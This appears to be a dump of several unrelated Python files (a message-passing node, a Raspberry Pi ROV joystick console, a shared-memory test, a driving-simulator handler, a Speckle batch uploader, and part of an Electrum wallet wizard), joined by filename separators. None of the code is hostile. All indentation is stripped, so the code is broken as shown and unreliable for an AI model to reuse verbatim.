self.process_message(message_to_process, connection)
return
def process_messagelist(self, msgconnlist):
"""Processes given message connection pairs"""
with self.lock:
self.msg_clientrequest_batch(msgconnlist)
return True
def process_message(self, message, connection):
"""Processes given message connection pair"""
# find method and invoke it holding a lock
mname = "msg_%s" % msg_names[message.type].lower()
try:
method = getattr(self, mname)
if self.debug: self.logger.write("State", "invoking method: %s" % mname)
except AttributeError:
if self.debug: self.logger.write("Method Error", "method not supported: %s" % mname)
return False
with self.lock:
method(connection, message)
return True
# message handlers
def msg_helo(self, conn, msg):
return
def msg_heloreply(self, conn, msg):
if msg.leader:
if msg.leader == self.me:
if self.debug: self.logger.write("State", "I'm the leader.")
return
else:
if self.debug: self.logger.write("State", "Adding new bootstrap.")
if msg.source in self.bootstrapset:
self.bootstrapset.remove(msg.source)
self.bootstrapset.add(msg.leader)
self.connecttobootstrap()
def msg_ping(self, conn, msg):
if self.debug: self.logger.write("State", "Replying to PING.")
pingreplymessage = create_message(MSG_PINGREPLY, self.me)
conn.send(pingreplymessage)
def msg_pingreply(self, conn, msg):
return
# shell commands generic to all nodes
def cmd_help(self, args):
"""prints the commands that are supported
by the corresponding Node."""
print "Commands supported:"
for attr in dir(self):
if attr.startswith("cmd_"):
print attr.replace("cmd_", "")
def cmd_exit(self, args):
"""Changes the liveness state and dies"""
self.alive = False
os._exit(0)
def cmd_state(self, args):
"""prints connectivity state of the corresponding Node."""
print "\n%s\n" % (self.statestr())
def get_user_input_from_shell(self):
"""Shell loop that accepts inputs from the command prompt and
calls corresponding command handlers."""
while self.alive:
try:
input = raw_input(">")
if len(input) == 0:
continue
else:
input = input.split()
mname = "cmd_%s" % input[0].lower()
try:
method = getattr(self, mname)
except AttributeError as e:
print "Command not supported: ", str(e)
continue
with self.lock:
method(input)
except KeyboardInterrupt:
os._exit(0)
except EOFError:
return
return
def send(self, message, peer=None, group=None):
if peer:
connection = self.connectionpool.get_connection_by_peer(peer)
if connection == None:
if self.debug: self.logger.write("Connection Error",
"Connection for %s cannot be found." % str(peer))
return -1
connection.send(message)
return message[FLD_ID]
elif group:
ids = []
for peer,liveness in group.iteritems():
connection = self.connectionpool.get_connection_by_peer(peer)
if connection == None:
if self.debug: self.logger.write("Connection Error",
"Connection for %s cannot be found." % str(peer))
continue
connection.send(message)
ids.append(message[FLD_ID])
message[FLD_ID] = assignuniqueid()
return ids
def terminate_handler(self, signal, frame):
if self.debug: self.logger.write("State", "exiting...")
self.logger.close()
sys.stdout.flush()
sys.stderr.flush()
os._exit(0)
def _graceexit(self, exitcode=0):
sys.stdout.flush()
sys.stderr.flush()
if hasattr(self, 'logger'): self.logger.close()
os._exit(exitcode)
|
main_pult.py
|
import os
import pygame
import logging
import threading
import configparser
from pprint import pprint
from time import sleep
from ast import literal_eval
from datetime import datetime
from signal import signal, SIGTERM, SIGHUP, pause
from rpi_lcd import LCD
import serial
DEBUG = False
PATH_CONFIG = '/home/pi/SoftAcademic/raspberry-pult/config_rov.ini'
class PULT_Logging:
'''Класс отвечающий за логирование. Логи пишуться в файл, так же выводться в консоль'''
def __init__(self):
self.mylogs = logging.getLogger(__name__)
self.mylogs.setLevel(logging.DEBUG)
# обработчик записи в лог-файл
name = 'log/PULT_LOG_' + \
'-'.join('-'.join('-'.join(str(datetime.now()).split()
).split('.')).split(':')) + '.log'
self.file = logging.FileHandler(name)
self.fileformat = logging.Formatter(
"%(asctime)s:%(levelname)s:%(message)s")
self.file.setLevel(logging.DEBUG)
self.file.setFormatter(self.fileformat)
# обработчик вывода в консоль лог файла
self.stream = logging.StreamHandler()
self.streamformat = logging.Formatter(
"%(levelname)s:%(module)s:%(message)s")
self.stream.setLevel(logging.DEBUG)
self.stream.setFormatter(self.streamformat)
# инициализация обработчиков
self.mylogs.addHandler(self.file)
self.mylogs.addHandler(self.stream)
self.mylogs.info('start-logging')
def debug(self, message):
'''сообщения отладочного уровня'''
self.mylogs.debug(message)
def info(self, message):
'''сообщения информационного уровня'''
self.mylogs.info(message)
def warning(self, message):
'''не критичные ошибки'''
self.mylogs.warning(message)
def critical(self, message):
'''мы почти тонем'''
self.mylogs.critical(message)
def error(self, message):
'''ребята я сваливаю ща рванет !!!!'''
self.mylogs.error(message)
class PULT_Controller():
def __init__(self, config) -> None:
os.environ["SDL_VIDEODRIVER"] = "dummy"
self.pygame = pygame
self.pygame.init()
self.config = config
joysticks = []
for i in range(self.pygame.joystick.get_count()):
joysticks.append(self.pygame.joystick.Joystick(i))
for self.joystick in joysticks:
self.joystick.init()
self.DataPult = {'j1-val-y': 0, 'j1-val-x': 0,
'j2-val-y': 0, 'j2-val-x': 0,
'man': 90, 'servoCam': 90,
'led': 0}
self.nitro = True
self.running = True
def listen(self):
cor_servo_cam = 0
while self.running:
for event in self.pygame.event.get():
# опрос нажания кнопок
if event.type == pygame.JOYBUTTONDOWN:
if event.button == int(self.config['JOYSTICK'][self.config['JOYSTICK']['camera_up']]):
cor_servo_cam = 1
if event.button == int(self.config['JOYSTICK'][self.config['JOYSTICK']['camera_down']]):
cor_servo_cam = -1
if event.button == int(self.config['JOYSTICK'][self.config['JOYSTICK']['arm_up']]):
self.DataPult['man'] = 180
if event.button == int(self.config['JOYSTICK'][self.config['JOYSTICK']['arm_down']]):
self.DataPult['man'] = 0
if event.button == int(self.config['JOYSTICK'][self.config['JOYSTICK']['led_up']]):
self.DataPult['led'] = 1
if event.button == int(self.config['JOYSTICK'][self.config['JOYSTICK']['led_down']]):
self.DataPult['led'] = 0
if event.button == int(self.config['JOYSTICK'][self.config['JOYSTICK']['nitro_up']]):
self.nitro = True
if event.button == int(self.config['JOYSTICK'][self.config['JOYSTICK']['nitro_down']]):
self.nitro = False
if event.type == pygame.JOYBUTTONUP:
if event.button == int(self.config['JOYSTICK'][self.config['JOYSTICK']['camera_up']]):
cor_servo_cam = 0
if event.button == int(self.config['JOYSTICK'][self.config['JOYSTICK']['camera_down']]):
cor_servo_cam = 0
# опрос стиков
if event.type == pygame.JOYAXISMOTION and abs(event.value) > float(self.config['JOYSTICK']['min_value']):
if event.axis == int(self.config['JOYSTICK'][self.config['JOYSTICK']['move_forward_back']]):
if self.nitro:
self.DataPult['j1-val-y'] = int(round(event.value, 2) * float(
self.config['JOYSTICK']['forward_back_nitro']) * float(self.config['JOYSTICK']['power_motor']) * 32767) - float(self.config['JOYSTICK']['cor_forward_back_nitro'])
else:
self.DataPult['j1-val-y'] = int(round(event.value, 2) * float(
self.config['JOYSTICK']['forward_back_defolt']) * float(self.config['JOYSTICK']['power_motor']) * 32767) - float(self.config['JOYSTICK']['cor_forward_back_defolt'])
if event.axis == int(self.config['JOYSTICK'][self.config['JOYSTICK']['move_left_right']]):
if self.nitro:
self.DataPult['j1-val-x'] = int(round(event.value, 2) * float(
self.config['JOYSTICK']['left_right_nitro']) * float(self.config['JOYSTICK']['power_motor']) * 32767) - float(self.config['JOYSTICK']['cor_left_right_nitro'])
else:
self.DataPult['j1-val-x'] = int(round(event.value, 2) * float(
self.config['JOYSTICK']['left_right_defolt']) * float(self.config['JOYSTICK']['power_motor']) * 32767) - float(self.config['JOYSTICK']['cor_left_right_defolt'])
if event.axis == int(self.config['JOYSTICK'][self.config['JOYSTICK']['move_up_down']]):
if self.nitro:
self.DataPult['j2-val-y'] = int(round(event.value, 2) * float(
self.config['JOYSTICK']['up_down_nitro']) * float(self.config['JOYSTICK']['power_motor']) * 32767) - float(self.config['JOYSTICK']['cor_up_down_nitro'])
else:
self.DataPult['j2-val-y'] = int(round(event.value, 2) * float(
self.config['JOYSTICK']['up_down_defolt']) * float(self.config['JOYSTICK']['power_motor']) * 32767) - float(self.config['JOYSTICK']['cor_up_down_defolt'])
if event.axis == int(self.config['JOYSTICK'][self.config['JOYSTICK']['move_turn-left_turn-righ']]):
if self.nitro:
self.DataPult['j2-val-x'] = int(round(event.value, 2) * float(
self.config['JOYSTICK']['turn-left_turn-righ_nitro']) * float(self.config['JOYSTICK']['power_motor']) * 32767) - float(self.config['JOYSTICK']['cor_turn-left_turn-righ_nitro'])
else:
self.DataPult['j2-val-x'] = int(round(event.value, 2) * float(
self.config['JOYSTICK']['turn-left_turn-righ_defolt']) * float(self.config['JOYSTICK']['power_motor']) * 32767) - float(self.config['JOYSTICK']['cor_turn-left_turn-righ_defolt'])
else:
self.DataPult['j1-val-y'], self.DataPult['j2-val-y'], self.DataPult['j1-val-x'], self.DataPult['j2-val-x'] = 0, 0, 0, 0
# повторная инициализация джойстика после отключения
if not self.joystick.get_init():
joysticks = []
for i in range(self.pygame.joystick.get_count()):
joysticks.append(self.pygame.joystick.Joystick(i))
for self.joystick in joysticks:
self.joystick.init()
break
# рассчет положения положения полезной нагрузки
self.DataPult['servoCam'] += cor_servo_cam
if self.DataPult['servoCam'] > 180:
self.DataPult['servoCam'] = 180
elif self.DataPult['servoCam'] < 0:
self.DataPult['servoCam'] = 0
sleep(float(self.config['JOYSTICK']['time_sleep']))
# print(self.DataPult)
def stop_listen(self):
self.running = False
class PULT_SerialPort:
def __init__(self,
logger: PULT_Logging = PULT_Logging,
port: str = '/dev/ttyS0',
bitrate: int = 115200
):
global DEBUG
# инициализация переменных
self.check_connect = False
self.logger = logger
# открытие порта
self.serial_port = serial.Serial(
port=port,
baudrate=bitrate,
timeout=0.1)
def Receiver_tnpa(self):
global DEBUG
'''прием информации с аппарата'''
data = None
while data == None or data == b'':
data = self.serial_port.readline()
try:
dataout = list(
map(lambda x: float(x), str(data)[3:-4].split(', ')))
except:
self.logger.warning('Error converting data')
return None
if DEBUG:
self.logger.debug(f'Receiver data : {str(data)}')
return dataout
def Control_tnpa(self, data: list = [50, 50, 50, 50, 50, 50, 90, 0, 0, 0]):
global DEBUG
'''отправка массива на аппарат'''
self.serial_port.write((f'{str(data)}\n').encode())
if DEBUG:
self.logger.debug('Send data: ' + str(data))
class PULT_Main:
def __init__(self):
self.DataInput = []
self.config = configparser.ConfigParser()
self.config.read(PATH_CONFIG)
# self.lcd = LCD()
# def safe_exit(signum, frame):
# exit(1)
# try:
# signal(SIGTERM, safe_exit)
# signal(SIGHUP, safe_exit)
# self.lcd.text("Hello,", 1)
# self.lcd.text("Command Post!", 2)
# except:
# pass
# finally:
# self.lcd.clear()
self.lodi = PULT_Logging()
self.serial_port = PULT_SerialPort(self.lodi) # поднимаем сервер
#self.lodi.info('ServerMainPult - init')
self.Controllps4 = PULT_Controller(self.config) # поднимаем контролеер
#self.lodi.info('MyController - init')
self.DataPult = self.Controllps4.DataPult
# частота оптправки
self.RateCommandOut = 0.1
# запись получаемой и отправляемой информации в лог файл
self.telemetria = False
#
self.CHECK_CONNECT = False
self.correct = True
self.lodi.info('MainPost-init')
def RunController(self):
'''запуск на прослушивание контроллера ps4'''
# self.lodi.info('MyController-listen')
self.Controllps4.listen()
def RunCommand(self, CmdMod=True):
self.lodi.info('MainPost-RunCommand')
'''
Движение вперед - (1 вперед 2 вперед 3 назад 4 назад)
Движение назад - (1 назад 2 назад 3 вперед 4 вперед)
Движение лагом вправо - (1 назад 2 вперед 3 вперед 4 назад)
Движение лагом влево - (1 вперед 2 назад 3 назад 4 вперед)
Движение вверх - (5 вниз 6 вниз)
Движение вниз - (5 вверх 6 вверх)
Описание протокола передачи:
С поста управлеия:
[motor0, motor1, motor2, motor3, motor4, motor5, ServoCam, Arm, led0, led1]
по умолчанию:
[0, 0, 0, 0, 0, 0, 90, 0, 0, 0]
C аппарата:
[напряжение(V), ток потребления(А), курс(градусы), глубина(м)]
[0,0,0,0]
'''
def transformation(value: int):
# Функция перевода значений АЦП с джойстика в проценты
value = (32768 - value) // 655
return value
def defense(value: int):
'''Функция защиты от некорректных данных'''
if value > 100:
value = 100
elif value < 0:
value = 0
return value
while True:
dataout = []
# запрос данный из класса пульта (потенциально слабое место)
data = self.DataPult
# математика преобразования значений с джойстика в значения для моторов
if self.telemetria:
self.lodi.debug(f'DataPult-{data}')
if self.correct:
J1_Val_Y = transformation(data['j1-val-y'])
J1_Val_X = transformation(data['j1-val-x'])
J2_Val_Y = transformation(data['j2-val-y'])
J2_Val_X = transformation(data['j2-val-x'])
else:
J1_Val_Y = transformation(data['j1-val-y'])
J1_Val_X = transformation(data['j1-val-x'])
J2_Val_Y = transformation(data['j2-val-y'])
J2_Val_X = transformation(data['j2-val-x'])
# Подготовка массива для отправки на аппарат
dataout.append(defense(J1_Val_Y + J1_Val_X + J2_Val_X - 100))
dataout.append(defense(J1_Val_Y - J1_Val_X - J2_Val_X + 100))
dataout.append(defense((-1 * J1_Val_Y) -
J1_Val_X + J2_Val_X + 100))
dataout.append(100 - defense((-1 * J1_Val_Y) +
J1_Val_X - J2_Val_X + 100))
dataout.append(defense(J2_Val_Y))
dataout.append(100 - defense(J2_Val_Y))
dataout.append(data['servoCam'])
if data['man'] > 80:
data['man'] = 80
if data['man'] < 55:
data['man'] = 55
dataout.append(data['man'])
dataout.append(data['led'])
dataout.append(data['led'])
# Запись управляющего массива в лог
if self.telemetria:
self.lodi.debug('DataOutput - {dataout}')
# отправка и прием сообщений
self.serial_port.Control_tnpa(dataout)
self.DataInput = self.serial_port.Receiver_tnpa()
if self.DataInput == None:
self.CHECK_CONNECT = False
self.lodi.critical('DataInput - NONE')
else:
self.CHECK_CONNECT = True
# Запись принятого массива в лог
if self.telemetria:
self.lodi.debug('DataInput - {self.DataInput}')
# возможность вывода принимаемой информации в соммандную строку
if CmdMod:
print(self.DataInput)
sleep(self.RateCommandOut)
def RunMain(self):
self.ThreadJoi = threading.Thread(target=self.RunController)
self.ThreadCom = threading.Thread(target=self.RunCommand)
self.ThreadJoi.start()
self.ThreadCom.start()
if __name__ == '__main__':
post = PULT_Main()
post.RunMain()
|
test.py
|
import time
from multiprocessing import Process
import shmarray
def worker(data):
while True:
data += 1
time.sleep(1)
def monitor(data):
while True:
print(data)
time.sleep(0.5)
data = shmarray.zeros(10)
procs = [Process(target=worker, args=(data,)), Process(target=monitor, args=(data,))]
for p in procs:
p.start()
for p in procs:
p.join()
|
donkey_sim.py
|
'''
file: donkey_sim.py
author: Tawn Kramer
date: 2018-08-31
'''
import os
import json
import shutil
import base64
import random
import time
from io import BytesIO
import math
from threading import Thread
import numpy as np
from PIL import Image
from io import BytesIO
import base64
import datetime
import asyncore
from donkey_gym.core.fps import FPSTimer
from donkey_gym.core.tcp_server import IMesgHandler, SimServer
from donkey_gym.envs.donkey_ex import SimFailed
class DonkeyUnitySimContoller():
def __init__(self, level, time_step=0.05, port=9090, max_cte=5.0, verbose=False, cam_resolution=(120, 160, 3)):
self.address = ('0.0.0.0', port)
self.handler = DonkeyUnitySimHandler(level, time_step=time_step, max_cte=max_cte, verbose=verbose, cam_resolution=cam_resolution)
try:
self.server = SimServer(self.address, self.handler)
except OSError:
print('raising custom error')
raise SimFailed("failed to listen on address %s" % self.address)
self.thread = Thread(target=asyncore.loop)
self.thread.daemon = True
self.thread.start()
def wait_until_loaded(self):
while not self.handler.loaded:
print("waiting for sim to start..")
time.sleep(3.0)
def reset(self):
self.handler.reset()
def get_sensor_size(self):
return self.handler.get_sensor_size()
def take_action(self, action):
self.handler.take_action(action)
def observe(self):
return self.handler.observe()
def quit(self):
pass
def render(self, mode):
pass
def is_game_over(self):
return self.handler.is_game_over()
def calc_reward(self, done):
return self.handler.calc_reward(done)
class DonkeyUnitySimHandler(IMesgHandler):
def __init__(self, level, time_step=0.05, max_cte=5.0, verbose=False, cam_resolution=None):
self.iSceneToLoad = level
self.time_step = time_step
self.wait_time_for_obs = 0.1
self.sock = None
self.loaded = False
self.verbose = verbose
self.max_cte = max_cte
self.timer = FPSTimer()
# sensor size - height, width, depth
self.camera_img_size = cam_resolution
self.image_array = np.zeros(self.camera_img_size)
self.last_obs = None
self.hit = "none"
self.cte = 0.0
self.x = 0.0
self.y = 0.0
self.z = 0.0
self.speed = 0.0
self.over = False
self.fns = {'telemetry' : self.on_telemetry,
"scene_selection_ready" : self.on_scene_selection_ready,
"scene_names": self.on_recv_scene_names,
"car_loaded" : self.on_car_loaded }
def on_connect(self, socketHandler):
self.sock = socketHandler
def on_disconnect(self):
self.sock = None
def on_recv_message(self, message):
if not 'msg_type' in message:
print('expected msg_type field')
return
msg_type = message['msg_type']
if msg_type in self.fns:
self.fns[msg_type](message)
else:
print('unknown message type', msg_type)
## ------- Env interface ---------- ##
def reset(self):
if self.verbose:
print("reseting")
self.image_array = np.zeros(self.camera_img_size)
self.last_obs = self.image_array
self.hit = "none"
self.cte = 0.0
self.x = 0.0
self.y = 0.0
self.z = 0.0
self.speed = 0.0
self.over = False
self.send_reset_car()
self.timer.reset()
time.sleep(1)
def get_sensor_size(self):
return self.camera_img_size
def take_action(self, action):
if self.verbose:
print("take_action")
self.send_control(action[0], action[1])
def observe(self):
while self.last_obs is self.image_array:
time.sleep(1.0 / 120.0)
self.last_obs = self.image_array
observation = self.image_array
done = self.is_game_over()
reward = self.calc_reward(done)
info = {}
self.timer.on_frame()
return observation, reward, done, info
def is_game_over(self):
return self.over
## ------ RL interface ----------- ##
def calc_reward(self, done):
if done:
return -1.0
if self.cte > self.max_cte:
return -1.0
if self.hit != "none":
return -2.0
#going fast close to the center of lane yeilds best reward
return 1.0 - (self.cte / self.max_cte) * self.speed
## ------ Socket interface ----------- ##
def on_telemetry(self, data):
imgString = data["image"]
image = Image.open(BytesIO(base64.b64decode(imgString)))
#always update the image_array as the observation loop will hang if not changing.
self.image_array = np.asarray(image)
#don't update other telemetry once session over
if self.over:
return
self.hit = data["hit"]
self.x = data["pos_x"]
self.y = data["pos_y"]
self.z = data["pos_z"]
self.speed = data["speed"]
#Cross track error not always present.
#Will be missing if path is not setup in the given scene.
#It should be setup in the 4 scenes available now.
try:
self.cte = data["cte"]
except:
pass
self.determine_episode_over()
def determine_episode_over(self):
#we have a few initial frames on start that are sometimes very large CTE when it's behind
#the path just slightly. We ignore those.
if math.fabs(self.cte) > 2 * self.max_cte:
pass
elif math.fabs(self.cte) > self.max_cte:
if self.verbose:
print("game over: cte", self.cte)
self.over = True
elif self.hit != "none":
if self.verbose:
print("game over: hit", self.hit)
self.over = True
def on_scene_selection_ready(self, data):
print("SceneSelectionReady ")
self.send_get_scene_names()
def on_car_loaded(self, data):
if self.verbose:
print("car loaded")
self.loaded = True
def on_recv_scene_names(self, data):
if data:
names = data['scene_names']
if self.verbose:
print("SceneNames:", names)
self.send_load_scene(names[self.iSceneToLoad])
def send_control(self, steer, throttle):
if not self.loaded:
return
msg = { 'msg_type' : 'control', 'steering': steer.__str__(), 'throttle':throttle.__str__(), 'brake': '0.0' }
self.queue_message(msg)
def send_reset_car(self):
msg = { 'msg_type' : 'reset_car' }
self.queue_message(msg)
def send_get_scene_names(self):
msg = { 'msg_type' : 'get_scene_names' }
self.queue_message(msg)
def send_load_scene(self, scene_name):
msg = { 'msg_type' : 'load_scene', 'scene_name' : scene_name }
self.queue_message(msg)
def queue_message(self, msg):
if self.sock is None:
if self.verbose:
print('skiping:', msg)
return
if self.verbose:
print('sending', msg)
self.sock.queue_message(msg)
|
batch_sender.py
|
import json
import logging
import threading
import queue
import time
import gzip
import requests
from specklepy.logging.exceptions import SpeckleException
LOG = logging.getLogger(__name__)
class BatchSender(object):
def __init__(
self,
server_url,
stream_id,
token,
max_batch_size_mb=1,
batch_buffer_length=10,
thread_count=4,
):
self.server_url = server_url
self.stream_id = stream_id
self._token = token
self.max_size = int(max_batch_size_mb * 1000 * 1000)
self._batches = queue.Queue(batch_buffer_length)
self._crt_batch = []
self._crt_batch_size = 0
self.thread_count = thread_count
self._send_threads = []
self._exception = None
def send_object(self, id: str, obj: str):
if not self._send_threads:
self._create_threads()
crt_obj_size = len(obj)
if not self._crt_batch or self._crt_batch_size + crt_obj_size < self.max_size:
self._crt_batch.append((id, obj))
self._crt_batch_size += crt_obj_size
return
self._batches.put(self._crt_batch)
self._crt_batch = [(id, obj)]
self._crt_batch_size = crt_obj_size
def flush(self):
# Add current non-complete batch
if self._crt_batch:
self._batches.put(self._crt_batch)
self._crt_batch = []
self._crt_batch_size = 0
# Wait for queued batches to be sent
self._batches.join()
# End the sending threads
self._delete_threads()
# If there was any error, throw the first exception that occurred during upload
if self._exception is not None:
ex = self._exception
self._exception = None
raise ex
def _sending_thread_main(self):
try:
session = requests.Session()
session.headers.update(
{"Authorization": f"Bearer {self._token}", "Accept": "text/plain"}
)
while True:
batch = self._batches.get()
# None is a sentinel value, meaning the thread should exit gracefully
if batch is None:
self._batches.task_done()
break
try:
self._bg_send_batch(session, batch)
except Exception as ex:
self._exception = self._exception or ex
LOG.error("Error sending batch of objects to server: " + str(ex))
self._batches.task_done()
except Exception as ex:
self._exception = self._exception or ex
LOG.error("ServerTransport sending thread error: " + str(ex))
def _bg_send_batch(self, session, batch):
object_ids = [obj[0] for obj in batch]
server_has_object = session.post(
url=f"{self.server_url}/api/diff/{self.stream_id}",
data={"objects": json.dumps(object_ids)},
).json()
new_object_ids = [x for x in object_ids if not server_has_object[x]]
new_object_ids = set(new_object_ids)
new_objects = [obj[1] for obj in batch if obj[0] in new_object_ids]
if not new_objects:
LOG.info(
f"Uploading batch of {len(batch)} objects: all objects are already in the server"
)
return
upload_data = "[" + ",".join(new_objects) + "]"
upload_data_gzip = gzip.compress(upload_data.encode())
LOG.info(
"Uploading batch of %s objects (%s new): (size: %s, compressed size: %s)"
% (len(batch), len(new_objects), len(upload_data), len(upload_data_gzip))
)
try:
r = session.post(
url=f"{self.server_url}/objects/{self.stream_id}",
files={"batch-1": ("batch-1", upload_data_gzip, "application/gzip")},
)
if r.status_code != 201:
LOG.warning("Upload server response: %s", r.text)
raise SpeckleException(
message=f"Could not save the object to the server - status code {r.status_code}"
)
except json.JSONDecodeError as error:
return SpeckleException(
f"Failed to send objects to {self.server_url}. Please ensure this stream ({self.stream_id}) exists on this server and that you have permission to send to it.",
error,
)
def _create_threads(self):
for _ in range(self.thread_count):
t = threading.Thread(target=self._sending_thread_main, daemon=True)
t.start()
self._send_threads.append(t)
def _delete_threads(self):
for _ in range(len(self._send_threads)):
self._batches.put(None)
for thread in self._send_threads:
thread.join()
self._send_threads = []
def __del__(self):
self._delete_threads()
|
installwizard.py
|
import os
import sys
import threading
import traceback
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from electrum import Wallet, WalletStorage
from electrum.util import UserCancelled, InvalidPassword
from electrum.base_wizard import BaseWizard, HWD_SETUP_DECRYPT_WALLET
from electrum.i18n import _
from .seed_dialog import SeedLayout, KeysLayout
from .network_dialog import NetworkChoiceLayout
from .util import *
from .password_dialog import PasswordLayout, PasswordLayoutForHW, PW_NEW
class GoBack(Exception):
pass
MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\
+ _("Leave this field empty if you want to disable encryption.")
MSG_HW_STORAGE_ENCRYPTION = _("Set wallet file encryption.") + '\n'\
+ _("Your wallet file does not contain secrets, mostly just metadata. ") \
+ _("It also contains your master public key that allows watching your addresses.") + '\n\n'\
+ _("Note: If you enable this setting, you will need your hardware device to open your wallet.")
class CosignWidget(QWidget):
size = 120
def __init__(self, m, n):
QWidget.__init__(self)
self.R = QRect(0, 0, self.size, self.size)
self.setGeometry(self.R)
self.setMinimumHeight(self.size)
self.setMaximumHeight(self.size)
self.m = m
self.n = n
def set_n(self, n):
self.n = n
self.update()
def set_m(self, m):
self.m = m
self.update()
def paintEvent(self, event):
bgcolor = self.palette().color(QPalette.Background)
pen = QPen(bgcolor, 7, Qt.SolidLine)
qp = QPainter()
qp.begin(self)
qp.setPen(pen)
qp.setRenderHint(QPainter.Antialiasing)
qp.setBrush(Qt.gray)
for i in range(self.n):
alpha = int(16* 360 * i/self.n)
alpha2 = int(16* 360 * 1/self.n)
qp.setBrush(Qt.green if i<self.m else Qt.gray)
qp.drawPie(self.R, alpha, alpha2)
qp.end()
def wizard_dialog(func):
def func_wrapper(*args, **kwargs):
run_next = kwargs['run_next']
wizard = args[0]
wizard.back_button.setText(_('Back') if wizard.can_go_back() else _('Cancel'))
try:
out = func(*args, **kwargs)
except GoBack:
wizard.go_back() if wizard.can_go_back() else wizard.close()
return
except UserCancelled:
return
#if out is None:
# out = ()
if type(out) is not tuple:
out = (out,)
run_next(*out)
return func_wrapper
# WindowModalDialog must come first as it overrides show_error
class InstallWizard(QDialog, MessageBoxMixin, BaseWizard):
accept_signal = pyqtSignal()
synchronized_signal = pyqtSignal(str)
def __init__(self, config, app, plugins, storage):
BaseWizard.__init__(self, config, storage)
QDialog.__init__(self, None)
self.setWindowTitle('ElectrumG - ' + _('Install Wizard'))
self.app = app
self.config = config
# Set for base base class
self.plugins = plugins
self.language_for_seed = config.get('language')
self.setMinimumSize(600, 400)
self.accept_signal.connect(self.accept)
self.title = QLabel()
self.main_widget = QWidget()
self.back_button = QPushButton(_("Back"), self)
self.back_button.setText(_('Back') if self.can_go_back() else _('Cancel'))
self.next_button = QPushButton(_("Next"), self)
self.next_button.setDefault(True)
self.logo = QLabel()
self.please_wait = QLabel(_("Please wait..."))
self.please_wait.setAlignment(Qt.AlignCenter)
self.icon_filename = None
self.loop = QEventLoop()
self.rejected.connect(lambda: self.loop.exit(0))
self.back_button.clicked.connect(lambda: self.loop.exit(1))
self.next_button.clicked.connect(lambda: self.loop.exit(2))
outer_vbox = QVBoxLayout(self)
inner_vbox = QVBoxLayout()
inner_vbox.addWidget(self.title)
inner_vbox.addWidget(self.main_widget)
inner_vbox.addStretch(1)
inner_vbox.addWidget(self.please_wait)
inner_vbox.addStretch(1)
scroll_widget = QWidget()
scroll_widget.setLayout(inner_vbox)
scroll = QScrollArea()
scroll.setWidget(scroll_widget)
scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
scroll.setWidgetResizable(True)
icon_vbox = QVBoxLayout()
icon_vbox.addWidget(self.logo)
icon_vbox.addStretch(1)
hbox = QHBoxLayout()
hbox.addLayout(icon_vbox)
hbox.addSpacing(5)
hbox.addWidget(scroll)
hbox.setStretchFactor(scroll, 1)
outer_vbox.addLayout(hbox)
outer_vbox.addLayout(Buttons(self.back_button, self.next_button))
self.set_icon(':icons/electrumg_small.png')
self.show()
self.raise_()
self.refresh_gui() # Need for QT on MacOSX. Lame.
def run_and_get_wallet(self, get_wallet_from_daemon):
vbox = QVBoxLayout()
hbox = QHBoxLayout()
hbox.addWidget(QLabel(_('Wallet') + ':'))
self.name_e = QLineEdit()
hbox.addWidget(self.name_e)
button = QPushButton(_('Choose...'))
hbox.addWidget(button)
vbox.addLayout(hbox)
self.msg_label = QLabel('')
vbox.addWidget(self.msg_label)
hbox2 = QHBoxLayout()
self.pw_e = QLineEdit('', self)
self.pw_e.setFixedWidth(150)
self.pw_e.setEchoMode(2)
self.pw_label = QLabel(_('Password') + ':')
hbox2.addWidget(self.pw_label)
hbox2.addWidget(self.pw_e)
hbox2.addStretch()
vbox.addLayout(hbox2)
self.set_layout(vbox, title=_('ElectrumG wallet'))
wallet_folder = os.path.dirname(self.storage.path)
def on_choose():
path, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if path:
self.name_e.setText(path)
def on_filename(filename):
path = os.path.join(wallet_folder, filename)
wallet_from_memory = get_wallet_from_daemon(path)
try:
if wallet_from_memory:
self.storage = wallet_from_memory.storage
else:
self.storage = WalletStorage(path, manual_upgrades=True)
self.next_button.setEnabled(True)
except BaseException:
traceback.print_exc(file=sys.stderr)
self.storage = None
self.next_button.setEnabled(False)
if self.storage:
if not self.storage.file_exists():
msg =_("This file does not exist.") + '\n' \
+ _("Press 'Next' to create this wallet, or choose another file.")
pw = False
elif not wallet_from_memory:
if self.storage.is_encrypted_with_user_pw():
msg = _("This file is encrypted with a password.") + '\n' \
+ _('Enter your password or choose another file.')
pw = True
elif self.storage.is_encrypted_with_hw_device():
msg = _("This file is encrypted using a hardware device.") + '\n' \
+ _("Press 'Next' to choose device to decrypt.")
pw = False
else:
msg = _("Press 'Next' to open this wallet.")
pw = False
else:
msg = _("This file is already open in memory.") + "\n" \
+ _("Press 'Next' to create/focus window.")
pw = False
else:
msg = _('Cannot read file')
pw = False
self.msg_label.setText(msg)
if pw:
self.pw_label.show()
self.pw_e.show()
self.pw_e.setFocus()
else:
self.pw_label.hide()
self.pw_e.hide()
button.clicked.connect(on_choose)
self.name_e.textChanged.connect(on_filename)
n = os.path.basename(self.storage.path)
self.name_e.setText(n)
while True:
if self.storage.file_exists() and not self.storage.is_encrypted():
break
if self.loop.exec_() != 2: # 2 = next
return
if not self.storage.file_exists():
break
wallet_from_memory = get_wallet_from_daemon(self.storage.path)
if wallet_from_memory:
return wallet_from_memory
if self.storage.file_exists() and self.storage.is_encrypted():
if self.storage.is_encrypted_with_user_pw():
password = self.pw_e.text()
try:
self.storage.decrypt(password)
break
except InvalidPassword as e:
QMessageBox.information(None, _('Error'), str(e))
continue
except BaseException as e:
traceback.print_exc(file=sys.stdout)
QMessageBox.information(None, _('Error'), str(e))
return
elif self.storage.is_encrypted_with_hw_device():
try:
self.run('choose_hw_device', HWD_SETUP_DECRYPT_WALLET)
except InvalidPassword as e:
QMessageBox.information(
None, _('Error'),
_('Failed to decrypt using this hardware device.') + '\n' +
_('If you use a passphrase, make sure it is correct.'))
self.stack = []
return self.run_and_get_wallet(get_wallet_from_daemon)
except BaseException as e:
traceback.print_exc(file=sys.stdout)
QMessageBox.information(None, _('Error'), str(e))
return
if self.storage.is_past_initial_decryption():
break
else:
return
else:
raise Exception('Unexpected encryption version')
path = self.storage.path
if self.storage.requires_split():
self.hide()
msg = _("The wallet '{}' contains multiple accounts, which are no longer supported.\n\n"
"Do you want to split your wallet into multiple files?").format(path)
if not self.question(msg):
return
file_list = '\n'.join(self.storage.split_accounts())
